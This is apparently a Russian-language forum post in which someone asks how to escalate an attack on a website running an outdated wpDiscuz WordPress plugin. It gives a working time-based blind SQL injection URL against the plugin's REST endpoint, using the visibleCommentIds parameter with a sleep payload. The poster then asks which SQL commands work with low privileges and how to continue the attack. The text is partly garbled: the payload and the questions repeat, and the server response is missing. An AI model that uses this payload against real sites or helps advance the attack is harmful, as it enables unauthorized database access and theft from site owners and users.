Новогодний шалом. Есть сайт с устаревшей версией плагина wp discuz, и если ему в get запросе в url параметр visibleCommentIds передать допустим
site.ru/wp-json/wpdiscuz/v1/update?lastId=0&postId=1&visibleCommentIds=if(now()=sysdate(),sleep(10),0)
то он ответит через 10секунд. Но при запросе допустим visibleCommentIds=SELECT * FROM information_schema.tables
он возвращает
Собственно какие дейтсвия и sql команды я могу выполнять с низкими правами? Как продолжать атаку? И возможна ли тут иньекция вообще?
site.ru/wp-json/wpdiscuz/v1/update?lastId=0&postId=1&visibleCommentIds=if(now()=sysdate(),sleep(10),0)
то он ответит через 10секунд. Но при запросе допустим visibleCommentIds=SELECT * FROM information_schema.tables
он возвращает
Собственно какие дейтсвия и sql команды я могу выполнять с низкими правами? Как продолжать атаку? И возможна ли тут иньекция вообще?